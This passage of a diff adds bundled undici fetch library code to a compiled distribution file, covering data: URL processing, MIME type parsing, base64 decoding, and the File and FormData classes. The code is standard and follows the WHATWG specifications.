https://github.com/nodejs/node/blob/b27ae24dcc4251bad726d9d84baf678d1f707fed/lib/internal/structured_clone.js + // structuredClone was added in v17.0.0, but fetch supports v16.8 + function structuredClone (value, options = undefined) { + if (arguments.length === 0) { + throw new TypeError('missing argument') + } + + if (!channel) { + channel = new MessageChannel() + } + channel.port1.unref() + channel.port2.unref() + channel.port1.postMessage(value, options?.transfer) + return receiveMessageOnPort(channel.port2).message + } + +module.exports = { + DOMException, + structuredClone, + subresource, + forbiddenMethods, + requestBodyHeader, + referrerPolicy, + requestRedirect, + requestMode, + requestCredentials, + requestCache, + redirectStatus, + corsSafeListedMethods, + nullBodyStatus, + safeMethods, + badPorts, + requestDuplex, + subresourceSet, + badPortsSet, + redirectStatusSet, + corsSafeListedMethodsSet, + safeMethodsSet, + forbiddenMethodsSet, + referrerPolicySet +} + + +/***/ }), + +/***/ 685: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +const assert = __nccwpck_require__(9491) +const { atob } = __nccwpck_require__(4300) +const { isomorphicDecode } = __nccwpck_require__(2538) + +const encoder = new TextEncoder() + +/** + * @see https://mimesniff.spec.whatwg.org/#http-token-code-point + */ +const HTTP_TOKEN_CODEPOINTS = /^[!#$%&'*+-.^_|~A-Za-z0-9]+$/ +const HTTP_WHITESPACE_REGEX = /(\u000A|\u000D|\u0009|\u0020)/ // eslint-disable-line +/** + * @see https://mimesniff.spec.whatwg.org/#http-quoted-string-token-code-point + */ +const HTTP_QUOTED_STRING_TOKENS = /[\u0009|\u0020-\u007E|\u0080-\u00FF]/ // eslint-disable-line + +// https://fetch.spec.whatwg.org/#data-url-processor +/** @param {URL} dataURL */ +function dataURLProcessor (dataURL) { + // 1. Assert: dataURL’s scheme is "data". + assert(dataURL.protocol === 'data:') + + // 2. Let input be the result of running the URL + // serializer on dataURL with exclude fragment + // set to true. + let input = URLSerializer(dataURL, true) + + // 3. Remove the leading "data:" string from input. + input = input.slice(5) + + // 4. Let position point at the start of input. + const position = { position: 0 } + + // 5. Let mimeType be the result of collecting a + // sequence of code points that are not equal + // to U+002C (,), given position. + let mimeType = collectASequenceOfCodePointsFast( + ',', + input, + position + ) + + // 6. Strip leading and trailing ASCII whitespace + // from mimeType. + // Undici implementation note: we need to store the + // length because if the mimetype has spaces removed, + // the wrong amount will be sliced from the input in + // step #9 + const mimeTypeLength = mimeType.length + mimeType = removeASCIIWhitespace(mimeType, true, true) + + // 7. If position is past the end of input, then + // return failure + if (position.position >= input.length) { + return 'failure' + } + + // 8. Advance position by 1. + position.position++ + + // 9. Let encodedBody be the remainder of input. + const encodedBody = input.slice(mimeTypeLength + 1) + + // 10. Let body be the percent-decoding of encodedBody. + let body = stringPercentDecode(encodedBody) + + // 11. If mimeType ends with U+003B (;), followed by + // zero or more U+0020 SPACE, followed by an ASCII + // case-insensitive match for "base64", then: + if (/;(\u0020){0,}base64$/i.test(mimeType)) { + // 1. Let stringBody be the isomorphic decode of body. + const stringBody = isomorphicDecode(body) + + // 2. Set body to the forgiving-base64 decode of + // stringBody. + body = forgivingBase64(stringBody) + + // 3. If body is failure, then return failure. + if (body === 'failure') { + return 'failure' + } + + // 4. Remove the last 6 code points from mimeType. + mimeType = mimeType.slice(0, -6) + + // 5. Remove trailing U+0020 SPACE code points from mimeType, + // if any. + mimeType = mimeType.replace(/(\u0020)+$/, '') + + // 6. Remove the last U+003B (;) code point from mimeType. + mimeType = mimeType.slice(0, -1) + } + + // 12. If mimeType starts with U+003B (;), then prepend + // "text/plain" to mimeType. + if (mimeType.startsWith(';')) { + mimeType = 'text/plain' + mimeType + } + + // 13. Let mimeTypeRecord be the result of parsing + // mimeType. + let mimeTypeRecord = parseMIMEType(mimeType) + + // 14. If mimeTypeRecord is failure, then set + // mimeTypeRecord to text/plain;charset=US-ASCII. + if (mimeTypeRecord === 'failure') { + mimeTypeRecord = parseMIMEType('text/plain;charset=US-ASCII') + } + + // 15. Return a new data: URL struct whose MIME + // type is mimeTypeRecord and body is body. + // https://fetch.spec.whatwg.org/#data-url-struct + return { mimeType: mimeTypeRecord, body } +} + +// https://url.spec.whatwg.org/#concept-url-serializer +/** + * @param {URL} url + * @param {boolean} excludeFragment + */ +function URLSerializer (url, excludeFragment = false) { + if (!excludeFragment) { + return url.href + } + + const href = url.href + const hashLength = url.hash.length + + return hashLength === 0 ? href : href.substring(0, href.length - hashLength) +} + +// https://infra.spec.whatwg.org/#collect-a-sequence-of-code-points +/** + * @param {(char: string) => boolean} condition + * @param {string} input + * @param {{ position: number }} position + */ +function collectASequenceOfCodePoints (condition, input, position) { + // 1. Let result be the empty string. + let result = '' + + // 2. While position doesn’t point past the end of input and the + // code point at position within input meets the condition condition: + while (position.position < input.length && condition(input[position.position])) { + // 1. Append that code point to the end of result. + result += input[position.position] + + // 2. Advance position by 1. + position.position++ + } + + // 3. Return result. + return result +} + +/** + * A faster collectASequenceOfCodePoints that only works when comparing a single character. + * @param {string} char + * @param {string} input + * @param {{ position: number }} position + */ +function collectASequenceOfCodePointsFast (char, input, position) { + const idx = input.indexOf(char, position.position) + const start = position.position + + if (idx === -1) { + position.position = input.length + return input.slice(start) + } + + position.position = idx + return input.slice(start, position.position) +} + +// https://url.spec.whatwg.org/#string-percent-decode +/** @param {string} input */ +function stringPercentDecode (input) { + // 1. Let bytes be the UTF-8 encoding of input. + const bytes = encoder.encode(input) + + // 2. Return the percent-decoding of bytes. + return percentDecode(bytes) +} + +// https://url.spec.whatwg.org/#percent-decode +/** @param {Uint8Array} input */ +function percentDecode (input) { + // 1. Let output be an empty byte sequence. + /** @type {number[]} */ + const output = [] + + // 2. For each byte byte in input: + for (let i = 0; i < input.length; i++) { + const byte = input[i] + + // 1. If byte is not 0x25 (%), then append byte to output. + if (byte !== 0x25) { + output.push(byte) + + // 2. Otherwise, if byte is 0x25 (%) and the next two bytes + // after byte in input are not in the ranges + // 0x30 (0) to 0x39 (9), 0x41 (A) to 0x46 (F), + // and 0x61 (a) to 0x66 (f), all inclusive, append byte + // to output. + } else if ( + byte === 0x25 && + !/^[0-9A-Fa-f]{2}$/i.test(String.fromCharCode(input[i + 1], input[i + 2])) + ) { + output.push(0x25) + + // 3. Otherwise: + } else { + // 1. Let bytePoint be the two bytes after byte in input, + // decoded, and then interpreted as hexadecimal number. + const nextTwoBytes = String.fromCharCode(input[i + 1], input[i + 2]) + const bytePoint = Number.parseInt(nextTwoBytes, 16) + + // 2. Append a byte whose value is bytePoint to output. + output.push(bytePoint) + + // 3. Skip the next two bytes in input. + i += 2 + } + } + + // 3. Return output. + return Uint8Array.from(output) +} + +// https://mimesniff.spec.whatwg.org/#parse-a-mime-type +/** @param {string} input */ +function parseMIMEType (input) { + // 1. Remove any leading and trailing HTTP whitespace + // from input. + input = removeHTTPWhitespace(input, true, true) + + // 2. Let position be a position variable for input, + // initially pointing at the start of input. + const position = { position: 0 } + + // 3. Let type be the result of collecting a sequence + // of code points that are not U+002F (/) from + // input, given position. + const type = collectASequenceOfCodePointsFast( + '/', + input, + position + ) + + // 4. If type is the empty string or does not solely + // contain HTTP token code points, then return failure. + // https://mimesniff.spec.whatwg.org/#http-token-code-point + if (type.length === 0 || !HTTP_TOKEN_CODEPOINTS.test(type)) { + return 'failure' + } + + // 5. If position is past the end of input, then return + // failure + if (position.position > input.length) { + return 'failure' + } + + // 6. Advance position by 1. (This skips past U+002F (/).) + position.position++ + + // 7. Let subtype be the result of collecting a sequence of + // code points that are not U+003B (;) from input, given + // position. + let subtype = collectASequenceOfCodePointsFast( + ';', + input, + position + ) + + // 8. Remove any trailing HTTP whitespace from subtype. + subtype = removeHTTPWhitespace(subtype, false, true) + + // 9. If subtype is the empty string or does not solely + // contain HTTP token code points, then return failure. + if (subtype.length === 0 || !HTTP_TOKEN_CODEPOINTS.test(subtype)) { + return 'failure' + } + + const typeLowercase = type.toLowerCase() + const subtypeLowercase = subtype.toLowerCase() + + // 10. Let mimeType be a new MIME type record whose type + // is type, in ASCII lowercase, and subtype is subtype, + // in ASCII lowercase. + // https://mimesniff.spec.whatwg.org/#mime-type + const mimeType = { + type: typeLowercase, + subtype: subtypeLowercase, + /** @type {Map} */ + parameters: new Map(), + // https://mimesniff.spec.whatwg.org/#mime-type-essence + essence: `${typeLowercase}/${subtypeLowercase}` + } + + // 11. While position is not past the end of input: + while (position.position < input.length) { + // 1. Advance position by 1. (This skips past U+003B (;).) + position.position++ + + // 2. Collect a sequence of code points that are HTTP + // whitespace from input given position. + collectASequenceOfCodePoints( + // https://fetch.spec.whatwg.org/#http-whitespace + char => HTTP_WHITESPACE_REGEX.test(char), + input, + position + ) + + // 3. Let parameterName be the result of collecting a + // sequence of code points that are not U+003B (;) + // or U+003D (=) from input, given position. + let parameterName = collectASequenceOfCodePoints( + (char) => char !== ';' && char !== '=', + input, + position + ) + + // 4. Set parameterName to parameterName, in ASCII + // lowercase. + parameterName = parameterName.toLowerCase() + + // 5. If position is not past the end of input, then: + if (position.position < input.length) { + // 1. If the code point at position within input is + // U+003B (;), then continue. + if (input[position.position] === ';') { + continue + } + + // 2. Advance position by 1. (This skips past U+003D (=).) + position.position++ + } + + // 6. If position is past the end of input, then break. + if (position.position > input.length) { + break + } + + // 7. Let parameterValue be null. + let parameterValue = null + + // 8. If the code point at position within input is + // U+0022 ("), then: + if (input[position.position] === '"') { + // 1. Set parameterValue to the result of collecting + // an HTTP quoted string from input, given position + // and the extract-value flag. + parameterValue = collectAnHTTPQuotedString(input, position, true) + + // 2. Collect a sequence of code points that are not + // U+003B (;) from input, given position. + collectASequenceOfCodePointsFast( + ';', + input, + position + ) + + // 9. Otherwise: + } else { + // 1. Set parameterValue to the result of collecting + // a sequence of code points that are not U+003B (;) + // from input, given position. + parameterValue = collectASequenceOfCodePointsFast( + ';', + input, + position + ) + + // 2. Remove any trailing HTTP whitespace from parameterValue. + parameterValue = removeHTTPWhitespace(parameterValue, false, true) + + // 3. If parameterValue is the empty string, then continue. + if (parameterValue.length === 0) { + continue + } + } + + // 10. If all of the following are true + // - parameterName is not the empty string + // - parameterName solely contains HTTP token code points + // - parameterValue solely contains HTTP quoted-string token code points + // - mimeType’s parameters[parameterName] does not exist + // then set mimeType’s parameters[parameterName] to parameterValue. + if ( + parameterName.length !== 0 && + HTTP_TOKEN_CODEPOINTS.test(parameterName) && + (parameterValue.length === 0 || HTTP_QUOTED_STRING_TOKENS.test(parameterValue)) && + !mimeType.parameters.has(parameterName) + ) { + mimeType.parameters.set(parameterName, parameterValue) + } + } + + // 12. Return mimeType. + return mimeType +} + +// https://infra.spec.whatwg.org/#forgiving-base64-decode +/** @param {string} data */ +function forgivingBase64 (data) { + // 1. Remove all ASCII whitespace from data. + data = data.replace(/[\u0009\u000A\u000C\u000D\u0020]/g, '') // eslint-disable-line + + // 2. If data’s code point length divides by 4 leaving + // no remainder, then: + if (data.length % 4 === 0) { + // 1. If data ends with one or two U+003D (=) code points, + // then remove them from data. + data = data.replace(/=?=$/, '') + } + + // 3. If data’s code point length divides by 4 leaving + // a remainder of 1, then return failure. + if (data.length % 4 === 1) { + return 'failure' + } + + // 4. If data contains a code point that is not one of + // U+002B (+) + // U+002F (/) + // ASCII alphanumeric + // then return failure. + if (/[^+/0-9A-Za-z]/.test(data)) { + return 'failure' + } + + const binary = atob(data) + const bytes = new Uint8Array(binary.length) + + for (let byte = 0; byte < binary.length; byte++) { + bytes[byte] = binary.charCodeAt(byte) + } + + return bytes +} + +// https://fetch.spec.whatwg.org/#collect-an-http-quoted-string +// tests: https://fetch.spec.whatwg.org/#example-http-quoted-string +/** + * @param {string} input + * @param {{ position: number }} position + * @param {boolean?} extractValue + */ +function collectAnHTTPQuotedString (input, position, extractValue) { + // 1. Let positionStart be position. + const positionStart = position.position + + // 2. Let value be the empty string. + let value = '' + + // 3. Assert: the code point at position within input + // is U+0022 ("). + assert(input[position.position] === '"') + + // 4. Advance position by 1. + position.position++ + + // 5. While true: + while (true) { + // 1. Append the result of collecting a sequence of code points + // that are not U+0022 (") or U+005C (\) from input, given + // position, to value. + value += collectASequenceOfCodePoints( + (char) => char !== '"' && char !== '\\', + input, + position + ) + + // 2. If position is past the end of input, then break. + if (position.position >= input.length) { + break + } + + // 3. Let quoteOrBackslash be the code point at position within + // input. + const quoteOrBackslash = input[position.position] + + // 4. Advance position by 1. + position.position++ + + // 5. If quoteOrBackslash is U+005C (\), then: + if (quoteOrBackslash === '\\') { + // 1. If position is past the end of input, then append + // U+005C (\) to value and break. + if (position.position >= input.length) { + value += '\\' + break + } + + // 2. Append the code point at position within input to value. + value += input[position.position] + + // 3. Advance position by 1. + position.position++ + + // 6. Otherwise: + } else { + // 1. Assert: quoteOrBackslash is U+0022 ("). + assert(quoteOrBackslash === '"') + + // 2. Break. + break + } + } + + // 6. If the extract-value flag is set, then return value. + if (extractValue) { + return value + } + + // 7. Return the code points from positionStart to position, + // inclusive, within input. + return input.slice(positionStart, position.position) +} + +/** + * @see https://mimesniff.spec.whatwg.org/#serialize-a-mime-type + */ +function serializeAMimeType (mimeType) { + assert(mimeType !== 'failure') + const { parameters, essence } = mimeType + + // 1. Let serialization be the concatenation of mimeType’s + // type, U+002F (/), and mimeType’s subtype. + let serialization = essence + + // 2. For each name → value of mimeType’s parameters: + for (let [name, value] of parameters.entries()) { + // 1. Append U+003B (;) to serialization. + serialization += ';' + + // 2. Append name to serialization. + serialization += name + + // 3. Append U+003D (=) to serialization. + serialization += '=' + + // 4. If value does not solely contain HTTP token code + // points or value is the empty string, then: + if (!HTTP_TOKEN_CODEPOINTS.test(value)) { + // 1. Precede each occurence of U+0022 (") or + // U+005C (\) in value with U+005C (\). + value = value.replace(/(\\|")/g, '\\$1') + + // 2. Prepend U+0022 (") to value. + value = '"' + value + + // 3. Append U+0022 (") to value. + value += '"' + } + + // 5. Append value to serialization. + serialization += value + } + + // 3. Return serialization. + return serialization +} + +/** + * @see https://fetch.spec.whatwg.org/#http-whitespace + * @param {string} char + */ +function isHTTPWhiteSpace (char) { + return char === '\r' || char === '\n' || char === '\t' || char === ' ' +} + +/** + * @see https://fetch.spec.whatwg.org/#http-whitespace + * @param {string} str + */ +function removeHTTPWhitespace (str, leading = true, trailing = true) { + let lead = 0 + let trail = str.length - 1 + + if (leading) { + for (; lead < str.length && isHTTPWhiteSpace(str[lead]); lead++); + } + + if (trailing) { + for (; trail > 0 && isHTTPWhiteSpace(str[trail]); trail--); + } + + return str.slice(lead, trail + 1) +} + +/** + * @see https://infra.spec.whatwg.org/#ascii-whitespace + * @param {string} char + */ +function isASCIIWhitespace (char) { + return char === '\r' || char === '\n' || char === '\t' || char === '\f' || char === ' ' +} + +/** + * @see https://infra.spec.whatwg.org/#strip-leading-and-trailing-ascii-whitespace + */ +function removeASCIIWhitespace (str, leading = true, trailing = true) { + let lead = 0 + let trail = str.length - 1 + + if (leading) { + for (; lead < str.length && isASCIIWhitespace(str[lead]); lead++); + } + + if (trailing) { + for (; trail > 0 && isASCIIWhitespace(str[trail]); trail--); + } + + return str.slice(lead, trail + 1) +} + +module.exports = { + dataURLProcessor, + URLSerializer, + collectASequenceOfCodePoints, + collectASequenceOfCodePointsFast, + stringPercentDecode, + parseMIMEType, + collectAnHTTPQuotedString, + serializeAMimeType +} + + +/***/ }), + +/***/ 8511: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { Blob, File: NativeFile } = __nccwpck_require__(4300) +const { types } = __nccwpck_require__(3837) +const { kState } = __nccwpck_require__(5861) +const { isBlobLike } = __nccwpck_require__(2538) +const { webidl } = __nccwpck_require__(1744) +const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) +const { kEnumerableProperty } = __nccwpck_require__(3983) +const encoder = new TextEncoder() + +class File extends Blob { + constructor (fileBits, fileName, options = {}) { + // The File constructor is invoked with two or three parameters, depending + // on whether the optional dictionary parameter is used. When the File() + // constructor is invoked, user agents must run the following steps: + webidl.argumentLengthCheck(arguments, 2, { header: 'File constructor' }) + + fileBits = webidl.converters['sequence'](fileBits) + fileName = webidl.converters.USVString(fileName) + options = webidl.converters.FilePropertyBag(options) + + // 1. Let bytes be the result of processing blob parts given fileBits and + // options. + // Note: Blob handles this for us + + // 2. Let n be the fileName argument to the constructor. + const n = fileName + + // 3. Process FilePropertyBag dictionary argument by running the following + // substeps: + + // 1. If the type member is provided and is not the empty string, let t + // be set to the type dictionary member. If t contains any characters + // outside the range U+0020 to U+007E, then set t to the empty string + // and return from these substeps. + // 2. Convert every character in t to ASCII lowercase. + let t = options.type + let d + + // eslint-disable-next-line no-labels + substep: { + if (t) { + t = parseMIMEType(t) + + if (t === 'failure') { + t = '' + // eslint-disable-next-line no-labels + break substep + } + + t = serializeAMimeType(t).toLowerCase() + } + + // 3. If the lastModified member is provided, let d be set to the + // lastModified dictionary member. If it is not provided, set d to the + // current date and time represented as the number of milliseconds since + // the Unix Epoch (which is the equivalent of Date.now() [ECMA-262]). + d = options.lastModified + } + + // 4. Return a new File object F such that: + // F refers to the bytes byte sequence. + // F.size is set to the number of total bytes in bytes. + // F.name is set to n. + // F.type is set to t. + // F.lastModified is set to d. + + super(processBlobParts(fileBits, options), { type: t }) + this[kState] = { + name: n, + lastModified: d, + type: t + } + } + + get name () { + webidl.brandCheck(this, File) + + return this[kState].name + } + + get lastModified () { + webidl.brandCheck(this, File) + + return this[kState].lastModified + } + + get type () { + webidl.brandCheck(this, File) + + return this[kState].type + } +} + +class FileLike { + constructor (blobLike, fileName, options = {}) { + // TODO: argument idl type check + + // The File constructor is invoked with two or three parameters, depending + // on whether the optional dictionary parameter is used. When the File() + // constructor is invoked, user agents must run the following steps: + + // 1. Let bytes be the result of processing blob parts given fileBits and + // options. + + // 2. Let n be the fileName argument to the constructor. + const n = fileName + + // 3. Process FilePropertyBag dictionary argument by running the following + // substeps: + + // 1. If the type member is provided and is not the empty string, let t + // be set to the type dictionary member. If t contains any characters + // outside the range U+0020 to U+007E, then set t to the empty string + // and return from these substeps. + // TODO + const t = options.type + + // 2. Convert every character in t to ASCII lowercase. + // TODO + + // 3. If the lastModified member is provided, let d be set to the + // lastModified dictionary member. If it is not provided, set d to the + // current date and time represented as the number of milliseconds since + // the Unix Epoch (which is the equivalent of Date.now() [ECMA-262]). + const d = options.lastModified ?? Date.now() + + // 4. Return a new File object F such that: + // F refers to the bytes byte sequence. + // F.size is set to the number of total bytes in bytes. + // F.name is set to n. + // F.type is set to t. + // F.lastModified is set to d. + + this[kState] = { + blobLike, + name: n, + type: t, + lastModified: d + } + } + + stream (...args) { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.stream(...args) + } + + arrayBuffer (...args) { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.arrayBuffer(...args) + } + + slice (...args) { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.slice(...args) + } + + text (...args) { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.text(...args) + } + + get size () { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.size + } + + get type () { + webidl.brandCheck(this, FileLike) + + return this[kState].blobLike.type + } + + get name () { + webidl.brandCheck(this, FileLike) + + return this[kState].name + } + + get lastModified () { + webidl.brandCheck(this, FileLike) + + return this[kState].lastModified + } + + get [Symbol.toStringTag] () { + return 'File' + } +} + +Object.defineProperties(File.prototype, { + [Symbol.toStringTag]: { + value: 'File', + configurable: true + }, + name: kEnumerableProperty, + lastModified: kEnumerableProperty +}) + +webidl.converters.Blob = webidl.interfaceConverter(Blob) + +webidl.converters.BlobPart = function (V, opts) { + if (webidl.util.Type(V) === 'Object') { + if (isBlobLike(V)) { + return webidl.converters.Blob(V, { strict: false }) + } + + if ( + ArrayBuffer.isView(V) || + types.isAnyArrayBuffer(V) + ) { + return webidl.converters.BufferSource(V, opts) + } + } + + return webidl.converters.USVString(V, opts) +} + +webidl.converters['sequence'] = webidl.sequenceConverter( + webidl.converters.BlobPart +) + +// https://www.w3.org/TR/FileAPI/#dfn-FilePropertyBag +webidl.converters.FilePropertyBag = webidl.dictionaryConverter([ + { + key: 'lastModified', + converter: webidl.converters['long long'], + get defaultValue () { + return Date.now() + } + }, + { + key: 'type', + converter: webidl.converters.DOMString, + defaultValue: '' + }, + { + key: 'endings', + converter: (value) => { + value = webidl.converters.DOMString(value) + value = value.toLowerCase() + + if (value !== 'native') { + value = 'transparent' + } + + return value + }, + defaultValue: 'transparent' + } +]) + +/** + * @see https://www.w3.org/TR/FileAPI/#process-blob-parts + * @param {(NodeJS.TypedArray|Blob|string)[]} parts + * @param {{ type: string, endings: string }} options + */ +function processBlobParts (parts, options) { + // 1. Let bytes be an empty sequence of bytes. + /** @type {NodeJS.TypedArray[]} */ + const bytes = [] + + // 2. For each element in parts: + for (const element of parts) { + // 1. If element is a USVString, run the following substeps: + if (typeof element === 'string') { + // 1. Let s be element. + let s = element + + // 2. If the endings member of options is "native", set s + // to the result of converting line endings to native + // of element. + if (options.endings === 'native') { + s = convertLineEndingsNative(s) + } + + // 3. Append the result of UTF-8 encoding s to bytes. + bytes.push(encoder.encode(s)) + } else if ( + types.isAnyArrayBuffer(element) || + types.isTypedArray(element) + ) { + // 2. If element is a BufferSource, get a copy of the + // bytes held by the buffer source, and append those + // bytes to bytes. + if (!element.buffer) { // ArrayBuffer + bytes.push(new Uint8Array(element)) + } else { + bytes.push( + new Uint8Array(element.buffer, element.byteOffset, element.byteLength) + ) + } + } else if (isBlobLike(element)) { + // 3. If element is a Blob, append the bytes it represents + // to bytes. + bytes.push(element) + } + } + + // 3. Return bytes. + return bytes +} + +/** + * @see https://www.w3.org/TR/FileAPI/#convert-line-endings-to-native + * @param {string} s + */ +function convertLineEndingsNative (s) { + // 1. Let native line ending be be the code point U+000A LF. + let nativeLineEnding = '\n' + + // 2. If the underlying platform’s conventions are to + // represent newlines as a carriage return and line feed + // sequence, set native line ending to the code point + // U+000D CR followed by the code point U+000A LF. + if (process.platform === 'win32') { + nativeLineEnding = '\r\n' + } + + return s.replace(/\r?\n/g, nativeLineEnding) +} + +// If this function is moved to ./util.js, some tools (such as +// rollup) will warn about circular dependencies. See: +// https://github.com/nodejs/undici/issues/1629 +function isFileLike (object) { + return ( + (NativeFile && object instanceof NativeFile) || + object instanceof File || ( + object && + (typeof object.stream === 'function' || + typeof object.arrayBuffer === 'function') && + object[Symbol.toStringTag] === 'File' + ) + ) +} + +module.exports = { File, FileLike, isFileLike } + + +/***/ }), + +/***/ 2015: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { isBlobLike, toUSVString, makeIterator } = __nccwpck_require__(2538) +const { kState } = __nccwpck_require__(5861) +const { File: UndiciFile, FileLike, isFileLike } = __nccwpck_require__(8511) +const { webidl } = __nccwpck_require__(1744) +const { Blob, File: NativeFile } = __nccwpck_require__(4300) + +/** @type {globalThis['File']} */ +const File = NativeFile ?? UndiciFile + +// https://xhr.spec.whatwg.org/#formdata +class FormData { + constructor (form) { + if (form !== undefined) { + throw webidl.errors.conversionFailed({ + prefix: 'FormData constructor', + argument: 'Argument 1', + types: ['undefined'] + }) + } + + this[kState] = [] + } + + append (name, value, filename = undefined) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 2, { header: 'FormData.append' }) + + if (arguments.length === 3 && !isBlobLike(value)) { + throw new TypeError( + "Failed to execute 'append' on 'FormData': parameter 2 is not of type 'Blob'" + ) + } + + // 1. Let value be value if given; otherwise blobValue. + + name = webidl.converters.USVString(name) + value = isBlobLike(value) + ? webidl.converters.Blob(value, { strict: false }) + : webidl.converters.USVString(value) + filename = arguments.length === 3 + ? webidl.converters.USVString(filename) + : undefined + + // 2. Let entry be the result of creating an entry with + // name, value, and filename if given. + const entry = makeEntry(name, value, filename) + + // 3. Append entry to this’s entry list. + this[kState].push(entry) + } + + delete (name) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.delete' }) + + name = webidl.converters.USVString(name) + + // The delete(name) method steps are to remove all entries whose name + // is name from this’s entry list. + this[kState] = this[kState].filter(entry => entry.name !== name) + } + + get (name) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.get' }) + + name = webidl.converters.USVString(name) + + // 1. If there is no entry whose name is name in this’s entry list, + // then return null. + const idx = this[kState].findIndex((entry) => entry.name === name) + if (idx === -1) { + return null + } + + // 2. Return the value of the first entry whose name is name from + // this’s entry list. + return this[kState][idx].value + } + + getAll (name) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.getAll' }) + + name = webidl.converters.USVString(name) + + // 1. If there is no entry whose name is name in this’s entry list, + // then return the empty list. + // 2. Return the values of all entries whose name is name, in order, + // from this’s entry list. + return this[kState] + .filter((entry) => entry.name === name) + .map((entry) => entry.value) + } + + has (name) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.has' }) + + name = webidl.converters.USVString(name) + + // The has(name) method steps are to return true if there is an entry + // whose name is name in this’s entry list; otherwise false. + return this[kState].findIndex((entry) => entry.name === name) !== -1 + } + + set (name, value, filename = undefined) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 2, { header: 'FormData.set' }) + + if (arguments.length === 3 && !isBlobLike(value)) { + throw new TypeError( + "Failed to execute 'set' on 'FormData': parameter 2 is not of type 'Blob'" + ) + } + + // The set(name, value) and set(name, blobValue, filename) method steps + // are: + + // 1. Let value be value if given; otherwise blobValue. + + name = webidl.converters.USVString(name) + value = isBlobLike(value) + ? webidl.converters.Blob(value, { strict: false }) + : webidl.converters.USVString(value) + filename = arguments.length === 3 + ? toUSVString(filename) + : undefined + + // 2. Let entry be the result of creating an entry with name, value, and + // filename if given. + const entry = makeEntry(name, value, filename) + + // 3. If there are entries in this’s entry list whose name is name, then + // replace the first such entry with entry and remove the others. + const idx = this[kState].findIndex((entry) => entry.name === name) + if (idx !== -1) { + this[kState] = [ + ...this[kState].slice(0, idx), + entry, + ...this[kState].slice(idx + 1).filter((entry) => entry.name !== name) + ] + } else { + // 4. Otherwise, append entry to this’s entry list. + this[kState].push(entry) + } + } + + entries () { + webidl.brandCheck(this, FormData) + + return makeIterator( + () => this[kState].map(pair => [pair.name, pair.value]), + 'FormData', + 'key+value' + ) + } + + keys () { + webidl.brandCheck(this, FormData) + + return makeIterator( + () => this[kState].map(pair => [pair.name, pair.value]), + 'FormData', + 'key' + ) + } + + values () { + webidl.brandCheck(this, FormData) + + return makeIterator( + () => this[kState].map(pair => [pair.name, pair.value]), + 'FormData', + 'value' + ) + } + + /** + * @param {(value: string, key: string, self: FormData) => void} callbackFn + * @param {unknown} thisArg + */ + forEach (callbackFn, thisArg = globalThis) { + webidl.brandCheck(this, FormData) + + webidl.argumentLengthCheck(arguments, 1, { header: 'FormData.forEach' }) + + if (typeof callbackFn !== 'function') { + throw new TypeError( + "Failed to execute 'forEach' on 'FormData': parameter 1 is not of type 'Function'." + ) + } + + for (const [key, value] of this) { + callbackFn.apply(thisArg, [value, key, this]) + } + } +} + +FormData.prototype[Symbol.iterator] = FormData.prototype.entries + +Object.defineProperties(FormData.prototype, { + [Symbol.toStringTag]: { + value: 'FormData', + configurable: true + } +}) + +/** + * @see https://html.spec.whatwg.org/multipage/form-control-infrastructure.html#create-an-entry + * @param {string} name + * @param {string|Blob} value + * @param {?string} filename + * @returns + */ +function makeEntry (name, value, filename) { + // 1. Set name to the result of converting name into a scalar value string. + // "To convert a string into a scalar value string, replace any surrogates + // with U+FFFD." + // see: https://nodejs.org/dist/latest-v18.x/docs/api/buffer.html#buftostringencoding-start-end + name = Buffer.from(name).toString('utf8') + + // 2. If value is a string, then set value to the result of converting + // value into a scalar value string. + if (typeof value === 'string') { + value = Buffer.from(value).toString('utf8') + } else { + // 3. Otherwise: + + // 1. If value is not a File object, then set value to a new File object, + // representing the same bytes, whose name attribute value is "blob" + if (!isFileLike(value)) { + value = value instanceof Blob + ? new File([value], 'blob', { type: value.type }) + : new FileLike(value, 'blob', { type: value.type }) + } + + // 2. If filename is given, then set value to a new File object, + // representing the same bytes, whose name attribute is filename. + if (filename !== undefined) { + /** @type {FilePropertyBag} */ + const options = { + type: value.type, + lastModified: value.lastModified + } + + value = (NativeFile && value instanceof NativeFile) || value instanceof UndiciFile + ? new File([value], filename, options) + : new FileLike(value, filename, options) + } + } + + // 4. Return an entry whose name is name and whose value is value. + return { name, value } +} + +module.exports = { FormData } + + +/***/ }), + +/***/ 1246: +/***/ ((module) => { + +"use strict"; + + +// In case of breaking changes, increase the version +// number to avoid conflicts. +const globalOrigin = Symbol.for('undici.globalOrigin.1') + +function getGlobalOrigin () { + return globalThis[globalOrigin] +} + +function setGlobalOrigin (newOrigin) { + if (newOrigin === undefined) { + Object.defineProperty(globalThis, globalOrigin, { + value: undefined, + writable: true, + enumerable: false, + configurable: false + }) + + return + } + + const parsedURL = new URL(newOrigin) + + if (parsedURL.protocol !== 'http:' && parsedURL.protocol !== 'https:') { + throw new TypeError(`Only http & https urls are allowed, received ${parsedURL.protocol}`) + } + + Object.defineProperty(globalThis, globalOrigin, { + value: parsedURL, + writable: true, + enumerable: false, + configurable: false + }) +} + +module.exports = { + getGlobalOrigin, + setGlobalOrigin +} + + +/***/ }), + +/***/ 554: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +// https://github.com/Ethan-Arrowood/undici-fetch + + + +const { kHeadersList, kConstruct } = __nccwpck_require__(2785) +const { kGuard } = __nccwpck_require__(5861) +const { kEnumerableProperty } = __nccwpck_require__(3983) +const { + makeIterator, + isValidHeaderName, + isValidHeaderValue +} = __nccwpck_require__(2538) +const { webidl 